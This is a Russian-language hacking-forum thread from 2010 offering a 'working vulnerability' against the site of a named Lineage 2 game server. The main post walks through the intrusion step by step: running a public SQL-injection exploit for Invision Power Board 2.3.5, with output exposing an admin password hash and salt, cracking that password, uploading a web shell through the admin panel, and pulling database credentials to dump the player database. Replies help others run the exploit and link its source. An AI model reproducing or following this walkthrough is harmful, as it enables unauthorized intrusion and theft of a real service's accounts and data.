Регистрация Главная Сообщество
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Рабочая уязвимость на l2europe.net (сервер из топ15)

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Закрытая тема
 
Опции темы
Старый 20.03.2010, 09:51   #1
 Старший сержант
Аватар для ATJIaHTuK
 
ATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личностьATJIaHTuK определенно авторитетная личность
Регистрация: 18.07.2009
Сообщений: 238
Популярность: 1258
Сказал(а) спасибо: 484
Поблагодарили 431 раз(а) в 182 сообщениях
 
По умолчанию Рабочая уязвимость на l2europe.net (сервер из топ15)

Взлом паблик багой одного из сервера в топ15 л2топа.
Работает на данный момент.
Базу заливать не буду - сделаете как на видео - сами сольете
Сайт - STRESSWEB 9, форум IPB.
Онлайн ~1k
В итоге получаем полный доступ к базе сервера(рисуете шмот, ГМправа,да что хотите и сливаете бд ).
В архиве сам видеофайл .avi ~15минут и txt файл из видео.
Размер архива ~115mb


[Ссылки могут видеть только зарегистрированные пользователи. ]
Взято с АЧ)
Нет возможности проверить, слишком большой размер.
________________
life is good
 
19 пользователя(ей) сказали cпасибо:
b1oz (20.03.2010), baks1 (09.04.2010), Bomjke (21.03.2010), botko (18.04.2010), Crawd (20.03.2010), dager315 (21.03.2010), Dimulya (20.03.2010), Ekziuperi (20.03.2010), Лёшик (20.03.2010), GoooD (06.04.2010), GraNIT (20.03.2010), Ha6cTeP (23.03.2010), Микки (20.03.2010), jekajkee (11.04.2010), Madnesss (23.03.2010), Skilled (22.03.2010), smertoO (20.03.2010), wednesday (21.03.2010), zaec233 (30.03.2010)
Старый 20.03.2010, 12:23   #2
 Разведчик
Аватар для Dimulya
 
Dimulya никому не известный тип
Регистрация: 16.07.2009
Сообщений: 10
Популярность: 14
Сказал(а) спасибо: 22
Поблагодарили 2 раз(а) в 2 сообщениях
Отправить сообщение для Dimulya с помощью ICQ Отправить сообщение для Dimulya с помощью Skype™
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от muceratoПосмотреть сообщение
Выложите плз текстовый документ.
Инет обрушился, через gprs сижу =)

[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 20.03.2010, 13:48   #3
 Сержант
Аватар для PornFlakex
 
PornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компанииPornFlakex душа компании
Регистрация: 25.02.2009
Сообщений: 140
Популярность: 966
Сказал(а) спасибо: 214
Поблагодарили 263 раз(а) в 118 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

l2europe.net вот этот сервер всё отличто работает
________________
Yeah Yeah Yeah
 
2 пользователя(ей) сказали cпасибо:
Crawd (20.03.2010), razor797 (20.12.2010)
Старый 20.03.2010, 14:23   #4
 Разведчик
Аватар для Crawd
 
Crawd на правильном пути
Регистрация: 02.02.2010
Сообщений: 7
Популярность: 52
Сказал(а) спасибо: 7
Поблагодарили 20 раз(а) в 4 сообщениях
Отправить сообщение для Crawd с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

с базой только одна проблема добрая половина акков была создана брутерами которые забыли про авторегу в первые часы сервака
 
Старый 20.03.2010, 16:48   #5
Заблокирован
 Рыцарь
Аватар для HellFire
 
HellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражанияHellFire блестящий пример для подражания
Регистрация: 15.06.2009
Сообщений: 353
Популярность: 1893
Сказал(а) спасибо: 582
Поблагодарили 833 раз(а) в 386 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Простенькое видео о взломе lineage сервера через паблик уязвимость
Нам нужен сплоит для ipb 2.3.5 такой есть в паблике.
У меня он уже скачан, так что не важно
Я только что проделывал это, но для видео сделаю все еще раз.

Z:\usr\local\php5>php.exe 2.3.5-ipb-multi.php -attack 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 639 //строка запуска сплоита

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [20.03.2010 03:35:29]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 639
/ Trying to get the password hash
+ pass_hash=f2a22f4ef46399fee58d5887b5623b88 - хэш пароля админа
+ Ok, using hash f2a22f4ef46399fee58d5887b5623b88
/ Trying to get the password salt
+ pass_salt=-Y,9? - соль
+ Ok, using salt -Y,9?
+ Enjoy!

+ [20.03.2010 03:35:41]
+ Total: 187

f2a22f4ef46399fee58d5887b5623b88:-Y,9?

теперь нам надо сбрутить это и получить пароль
я буду использовать EGB от insidepro, можно использовать и passwordsPRO

Настройки программы. Будем брутить только маленькие символы=) Авось повезет
; Standard character sets:
; ?d: 0123456789
; ?l: abcdefghijklmnopqrstuvwxyz
; ?u: ABCDEFGHIJKLMNOPQRSTUVWXYZ
; ?s: !@#$%^&*()`~-_=+\|[]{};:'",.<>/?
CharacterSet=?l

Все, пароль нашелся. Он был простой...

C:\music NEW\egb(2)\Новая папка>"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
f2a22f4ef46399fee58d5887b5623b88:ybrbnf

All passwords found!
C:\music NEW\egb(2)\Новая папка>


Теперь заходим админом на форум.

Теперь нужно залить шелл в админку

[Ссылки могут видеть только зарегистрированные пользователи. ] - тут описано как сделать это

качаем [Ссылки могут видеть только зарегистрированные пользователи. ] =)
теперь заливаем в админку.

Сделали по инструкции и залили шелл

Сообщение от c0m
В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
[Ссылки могут видеть только зарегистрированные пользователи. ]

[Ссылки могут видеть только зарегистрированные пользователи. ] - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал


вот и наш шелл) теперь надо найти пароль от бд и слить её.

Данные от БД
define("DBHOST","localhost");
define("DBUSER","l2biz_l2");
define("DBPASS","1q2w3e");
define("DBNAME","l2biz_l2");
define("COLLATE","utf8");

Я для удобства залью другой шелл, ибо МНЕ тяжело работать с этим, не привык
WSO2 так гораздо удобнее=)
Подключаемся к БД

Нашли информацию о базах L2 сервера)
Все мы в бд ла2, да кстати движок на сайте стоит STRESSWEB 9.
Все, сливаем базу и выкладываем на allcheats.ru
теперь стираем шеллы и идем спать.
Всем спасибо.

описание видео.
 
Старый 21.03.2010, 16:29   #6
обжигающий
 Главнокомандующий
Аватар для object
 
object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(
Регистрация: 17.11.2009
Сообщений: 1,062
Популярность: 64819
Золото Zhyk.Ru: 170
Сказал(а) спасибо: 1,456
Поблагодарили 2,062 раз(а) в 822 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Не кто не даст ту программку?)
Сплоит Ип борда
________________
Полные взломы игрулек VK:
Качок | Баббла Кадабра | Академия монстров | Клуб Искателей(?fix) | [HOT-NEW] Толстая птица онлайн
 
Старый 21.03.2010, 16:36   #7
 Пехотинец
Аватар для fuzzion
 
fuzzion на правильном пути
Регистрация: 08.02.2010
Сообщений: 62
Популярность: 52
Сказал(а) спасибо: 21
Поблагодарили 21 раз(а) в 13 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

_http://packetstormsecurity.org/0808-exploits/ipb235-multi.txt
 
Пользователь сказал cпасибо:
Nickitee (21.03.2010)
Старый 21.03.2010, 17:01   #8
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Да вы что...
Сплоит работает на 1% всех форумов IPB
Работает он ТОЛЬКО на 2.3.5

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [04.04.2010 18:01:09]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
&name=%2527
+ [04.04.2010 18:01:10]
+ Total: 1
 
Старый 21.03.2010, 17:22   #9
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [04.04.2010 18:01:09]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
&name=%2527
+ [04.04.2010 18:01:10]
+ Total: 1
 
Старый 21.03.2010, 17:41   #10
 Разведчик
Аватар для Ingi
 
Ingi никому не известный тип
Регистрация: 14.03.2010
Сообщений: 6
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

[Ссылки могут видеть только зарегистрированные пользователи. ]
 
2 пользователя(ей) сказали cпасибо:
Ha6cTeP (21.03.2010), Nickitee (21.03.2010)
Старый 21.03.2010, 17:49   #11
 Разведчик
Аватар для Bomjke
 
Bomjke никому не известный тип
Регистрация: 02.03.2010
Сообщений: 15
Популярность: 18
Сказал(а) спасибо: 17
Поблагодарили 15 раз(а) в 11 сообщениях
Отправить сообщение для Bomjke с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

[Ссылки могут видеть только зарегистрированные пользователи. ]
ХЕЛП
 
Старый 21.03.2010, 17:58   #12
 Разведчик
Аватар для Bomjke
 
Bomjke никому не известный тип
Регистрация: 02.03.2010
Сообщений: 15
Популярность: 18
Сказал(а) спасибо: 17
Поблагодарили 15 раз(а) в 11 сообщениях
Отправить сообщение для Bomjke с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Всё получилась теперь новая проблема вписал адрес нажимаю ентер открываетса новая командная строка с каким то текстом и сразу закрываетса, а в 1 ни чего не пишет ...
 
Старый 21.03.2010, 18:34   #13
 Разведчик
Аватар для CeDou
 
CeDou на правильном пути
Регистрация: 07.02.2010
Сообщений: 31
Популярность: 26
Сказал(а) спасибо: 47
Поблагодарили 8 раз(а) в 6 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

Цитата:
Сообщение от NickiteeПосмотреть сообщение
D:\ololo>php.exe 2.3.5-ipb-multi.php
"php.exe" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом

Ололо, хелп xD

до этой строки
Цитата:
php.exe 2.3.5-ipb-multi.php

должен быть путь где находится php интерпритатор.

В большинстве случаев, если это денвер и ставилось по дефолту. путь будет как у автора

И файл 2.3.5-ipb-multi.php должен быть в папке с интерпритатором
 
Старый 21.03.2010, 18:49   #14
 Пехотинец
Аватар для fuzzion
 
fuzzion на правильном пути
Регистрация: 08.02.2010
Сообщений: 62
Популярность: 52
Сказал(а) спасибо: 21
Поблагодарили 21 раз(а) в 13 сообщениях
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

у меня другая проблема - ввожу тип атаки урл етц. и мне опять показывают искходный код скрипта, как если бы я просто прописал его запуск x_x
 
Старый 21.03.2010, 20:12   #15
 Разведчик
Аватар для Bomjke
 
Bomjke никому не известный тип
Регистрация: 02.03.2010
Сообщений: 15
Популярность: 18
Сказал(а) спасибо: 17
Поблагодарили 15 раз(а) в 11 сообщениях
Отправить сообщение для Bomjke с помощью ICQ
 
По умолчанию Re: Рабочая уязвимость на сайте сервера из топ15 l2top

[Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ]
Форум IP.Board 2.3.5
Пробуйте мб у меня трабл ...

Последний раз редактировалось Bomjke; 21.03.2010 в 20:20.
 
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
l2europe dtg Базы серверов и брут 15 23.03.2010 15:04
l2europe.net phreaker Архив 25 21.03.2010 18:33
[Помогите!] У меня не сохраняется топ15, ранк!! semenronaldo9 Общение и обсуждение Counter-Strike 9 21.03.2010 14:30

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 17:49.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net